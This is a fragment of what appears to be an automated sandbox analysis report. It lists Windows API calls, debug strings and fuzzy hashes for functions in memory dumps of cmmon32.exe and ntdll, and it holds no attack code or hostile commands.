                                                          • Opcode Fuzzy Hash: 8b02a15480f7a540bf1df8a3913bf04ee24aaaf4487d987743870ff8ca339e02
                                                          • Instruction Fuzzy Hash: 68D15EB1901311EFDB128F54C8C9BD97BA9FF49710F0881BAED09AF256DBB09540CBA0
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0033448B
                                                          • IsWindowVisible.USER32(?), ref: 003344B1
                                                          • GetTickCount.KERNEL32 ref: 003344BE
                                                          • GetTickCount.KERNEL32 ref: 003344CD
                                                          • MsgWaitForMultipleObjects.USER32(00000000,?,00000000,00000000,000004FF), ref: 0033454B
                                                          • GetLastError.KERNEL32 ref: 003345B8
                                                          Strings
                                                          • MsgWaitForMultipleObjects failed, LastError:%d, xrefs: 003345BF
                                                          • CCmConnection::StateConnectedGetEvent() - m_hEventRasNotify && ahObjectsToWait[dwRes - WAIT_OBJECT_0] == m_hEventRasNotify, xrefs: 003345DE
                                                          • MsgWaitForMultipleObjects returns %d, xrefs: 003345C7
                                                          • CCmConnection::StateConnectedGetEvent() - m_WatchProcess.IsIdle(), xrefs: 0033458A
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                          • Associated: 0000000E.00000002.3714532226.0000000000339000.00000040.80000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_330000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: CountTick$ErrorLastMessageMultipleObjectsPeekVisibleWaitWindow
                                                          • String ID: CCmConnection::StateConnectedGetEvent() - m_WatchProcess.IsIdle()$CCmConnection::StateConnectedGetEvent() - m_hEventRasNotify && ahObjectsToWait[dwRes - WAIT_OBJECT_0] == m_hEventRasNotify$MsgWaitForMultipleObjects failed, LastError:%d$MsgWaitForMultipleObjects returns %d
                                                          • API String ID: 1792462035-3812601745
                                                          • Opcode ID: 8cd13f821d7f7545887d5597da23ece2e0d71317acad277783ea2ce6d3ba8257
                                                          • Instruction ID: c53aef44acdff47f298755b417ab96ded2e7f70c86795e55c8b2b262a7025cba
                                                          • Opcode Fuzzy Hash: 8cd13f821d7f7545887d5597da23ece2e0d71317acad277783ea2ce6d3ba8257
                                                          • Instruction Fuzzy Hash: 3051B271A00205DBEF26DFA6D8C9BAE77ACFF85311F150639F562D2190DB71A940CB21
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 89d290979a43a2e71cbcf5c827d67b0b28fc1825df42e977095bdc5518a306f7
                                                          • Instruction ID: c2ff8ceb4d3e62537af315d4aab518dc8040df3c6793e231d4879763629a05e8
                                                          • Opcode Fuzzy Hash: 89d290979a43a2e71cbcf5c827d67b0b28fc1825df42e977095bdc5518a306f7
                                                          • Instruction Fuzzy Hash: 6651E6B2A00216BFDF20DF9998D097EF7BABB49205714C1A9E465D7641E334FF409BA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: c864e832d73044f12ca6bfcc2b959180e235cecbfaa5f5be2c4ef3407d325def
                                                          • Instruction ID: 9e7da55d4aef2a651974aa62fec895e1bbfe682e99bcdae3dba4621413ecb0b8
                                                          • Opcode Fuzzy Hash: c864e832d73044f12ca6bfcc2b959180e235cecbfaa5f5be2c4ef3407d325def
                                                          • Instruction Fuzzy Hash: 5D512671A00666AFDB30DF9DC89097FB7FAEB84208B048499E496D7741E674FB109B60
                                                          Strings
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04C646FC
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04C64725
                                                          • Execute=1, xrefs: 04C64713
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04C64787
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04C64742
                                                          • ExecuteOptions, xrefs: 04C646A0
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04C64655
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: e91f6dcf5169f3859307b1a73203d1e5fea396ca181ff5ffe658509d8444f547
                                                          • Instruction ID: 50a7db4265d9cd8cc68e10592f60c610bc72f178f2478dbedc9941386aa697a1
                                                          • Opcode Fuzzy Hash: e91f6dcf5169f3859307b1a73203d1e5fea396ca181ff5ffe658509d8444f547
                                                          • Instruction Fuzzy Hash: 1F5137316012296BEF11EBA9DDC9BA937AAEF04704F0400E9D506AB190EBB0BF45DF54
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction ID: a9df5d1436904bc7e66a86189bff3dd05a7ca58de099182b06eada805b1ffecf
                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction Fuzzy Hash: F4021571608341AFD315CF28C994A6FBBE6EFC8704F04892DF9898B264DB31E945DB52
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: 705d5167dfab8ae1a09735e4f148e0449346404bd45fd4984275c0bbc0c474c0
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: 9681C270E052499EDF288E68C8917FEBBB3EF45312F18411AD851A7293E734BE40CB61
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: 2cb68ac70f19d203ada33fa8325116b8d51215d49f8de786f18a2f7d9f67f578
                                                          • Instruction ID: b8374c4824391967f826d5f405bcfffbcc1e959caacb48b3662cdc47e5a913ab
                                                          • Opcode Fuzzy Hash: 2cb68ac70f19d203ada33fa8325116b8d51215d49f8de786f18a2f7d9f67f578
                                                          • Instruction Fuzzy Hash: BE21537AA0012AABDB10DEA9D844ABE77FAEF44658F040156EA05D3200E734AA119BA1
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,00334190,?,00000000,?), ref: 00334149
                                                          • GetLastError.KERNEL32(?,00000000,?), ref: 00334155
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00334178
                                                          Strings
                                                          • CCmConnection::StartConnectionThread CreateThread succeeded, xrefs: 0033416C
                                                          • CCmConnection::StartConnectionThread CreateThread failed: 0x%x, xrefs: 0033415C
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                          • Associated: 0000000E.00000002.3714532226.0000000000339000.00000040.80000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_330000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateErrorHandleLastThread
                                                          • String ID: CCmConnection::StartConnectionThread CreateThread failed: 0x%x$CCmConnection::StartConnectionThread CreateThread succeeded
                                                          • API String ID: 747004058-682360242
                                                          • Opcode ID: b02da26ce81d41ec2a6dcc0cf3a8616bf6c2b0ceaac91f6061483e61ec1609f4
                                                          • Instruction ID: e673bf817fc15879d69a2313c5761abb5ff4482e8a35f48ac3851bf7be5dab6a
                                                          • Opcode Fuzzy Hash: b02da26ce81d41ec2a6dcc0cf3a8616bf6c2b0ceaac91f6061483e61ec1609f4
                                                          • Instruction Fuzzy Hash: 58E06DB3A14610BF6B1B67B1AC8BDBB269DDA85322F110111FC02D6040F990ED8085B1
Strings
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C602E7
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C602BD
• RTL: Re-Waiting, xrefs: 04C6031E
Memory Dump Source
• Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
• Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
• Opcode ID: 1da5ff1b58865401911727224cd10538b29236a40455183d4355c1abde4f9abb
• Instruction ID: ac4f30c831856e1a4dfa5f4b5e92373d77d2983fcbc038bd7c661c35155e9924
• Opcode Fuzzy Hash: 1da5ff1b58865401911727224cd10538b29236a40455183d4355c1abde4f9abb
• Instruction Fuzzy Hash: DAE1E0706047419FD725CF29C884B2AB7E2BF8A314F144A6DF4A69B2E0E774F944DB42
Strings
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04C67B7F
• RTL: Resource at %p, xrefs: 04C67B8E
• RTL: Re-Waiting, xrefs: 04C67BAC
Memory Dump Source
• Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
• Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
• Opcode ID: e5ffcd820394e3e335dc61d2faf98b46e318350b89783b636747a131c1ccabc9
• Instruction ID: 50cc67b6423b51f0044de43285a42ad0fb09b259c3db6f8a1ce9f241171b878b
• Opcode Fuzzy Hash: e5ffcd820394e3e335dc61d2faf98b46e318350b89783b636747a131c1ccabc9
• Instruction Fuzzy Hash: DC41E3353057029FD720DE25C980B6AB7E6FF88714F000A1DF95ADB680EB71F9059B91
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C6728C
Strings
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04C67294
• RTL: Resource at %p, xrefs: 04C672A3
• RTL: Re-Waiting, xrefs: 04C672C1
Memory Dump Source
• Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
• Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: 878165137ce5919c766076898ce6b1273811c2a903d82f2286173266bbffb30f
• Instruction ID: 33d566f848a8597b64e7b45d4a90497388957a65f9357bcd8762ebd88ea9a3fb
• Opcode Fuzzy Hash: 878165137ce5919c766076898ce6b1273811c2a903d82f2286173266bbffb30f
• Instruction Fuzzy Hash: D1412231701612ABE720DE25CD81F7AB7A2FF84718F144A19F956EB240EB70F9429BD0
Memory Dump Source
• Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
• Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: b1f21c37ba3e34dde17159cb96fdca3ef1c4f976cf76d0fff628bdd25901d4e8
• Instruction ID: c0d434acb15e5117ae63a0a12199602715b15d7986c604ccebcb8c9c70bb7874
• Opcode Fuzzy Hash: b1f21c37ba3e34dde17159cb96fdca3ef1c4f976cf76d0fff628bdd25901d4e8
• Instruction Fuzzy Hash: F6318472A0122A9FDB20DE29DC40BFE77FDEF45614F440595E949E3200EB30BA559BA1
APIs
• IsLogonAsSystem.CMUTIL(00000000,?,0033496F,?,?,?), ref: 00334A1E
• ?GPPB@CIniW@@QBEHPBG0H@Z.CMUTIL(Connection Manager,AutoReconnect,00000000,?,?,?), ref: 00334A39
Memory Dump Source
• Source File: 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: true
• Associated: 0000000E.00000002.3714532226.0000000000339000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_330000_cmmon32.jbxd
Similarity
• API ID: LogonSystem
• String ID: AutoReconnect$Connection Manager
• API String ID: 39500261-4026703651
• Opcode ID: c7d07846c7fa71d70ff5f91e616898001f14c8b96e93968b429823f7c6f55d54
• Instruction ID: d1f8ca662874eacb7727ce02517898fd52e8d21f0fd9650486daeaea0c4a5ebc
• Opcode Fuzzy Hash: c7d07846c7fa71d70ff5f91e616898001f14c8b96e93968b429823f7c6f55d54
• Instruction Fuzzy Hash: D1D05E327440616786268A26BCCC9C7EA599FD1B61F164166F815E3210DAA04C4585C0
Memory Dump Source
• Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
• Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction ID: 2f146b7664ecb33a512d2219eb71f3472eab21e1fcab81dcf1f41464745f177c
• Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction Fuzzy Hash: 569195B1E012159FDF24DF69C8806BEB7A7BF48722F14C51AF855A72C0E734BA409760
Memory Dump Source
• Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
• Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 810de407925839a368741c10e7f91e58c2d40af2edc6057bb335762e025c7685
• Instruction ID: 3bfc5406246ab6d348ac1217cd2ebaeec8ed3fa8eb9a9a5f4f61751bfb34fa92
• Opcode Fuzzy Hash: 810de407925839a368741c10e7f91e58c2d40af2edc6057bb335762e025c7685
• Instruction Fuzzy Hash: 1A812BB5D002699BDB31CF54CC44BEEB7B5AB08714F0041EAAA1DB7290E7706E84DFA4
APIs
  • Part of subcall function 003365D7: memset.MSVCRT ref: 003365FE
  • Part of subcall function 003365D7: WideCharToMultiByte.KERNEL32(00000000,00000400,000000FF,000000FF,00000000,00000000,00000000,00000000,00000000,=====================================================,00000208), ref: 00336623
  • Part of subcall function 003365D7: LocalAlloc.KERNEL32(00000040,00000000), ref: 00336632
  • Part of subcall function 003365D7: WideCharToMultiByte.KERNEL32(00000000,00000400,000000FF,000000FF,00000000,00000000,00000000,00000000), ref: 0033664D
  • Part of subcall function 003365D7: lstrlenA.KERNEL32(?,00000000,00000000,0033557B), ref: 00336680
  • Part of subcall function 003365D7: LocalFree.KERNEL32(00000000,00000000,=====================================================,00000208), ref: 00336687
• LoadLibraryExW.KERNEL32(?,00000000,00000000,?,0033573D,User32.dll), ref: 00333960
Memory Dump Source
• Source File: 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: true
• Associated: 0000000E.00000002.3714532226.0000000000339000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_330000_cmmon32.jbxd
Similarity
• API ID: ByteCharLocalMultiWide$AllocFreeLibraryLoadlstrlenmemset
• String ID: =W3$CDynamicLibrary - Loading library - %s
• API String ID: 4236014511-3960775831
• Opcode ID: d064c1dca2a23081594172e8771da419717770362e0ebede1e89cb5cf521d24e
• Instruction ID: caec05a232e4a2529df07ed8196d58a1ab95e72bab4e6a51a5cbd923f42248a6
• Opcode Fuzzy Hash: d064c1dca2a23081594172e8771da419717770362e0ebede1e89cb5cf521d24e
• Instruction Fuzzy Hash: 7BE0C2722442147BE7251A15EC47F8B3E88CF10330F144235F968D91D0E9A298509784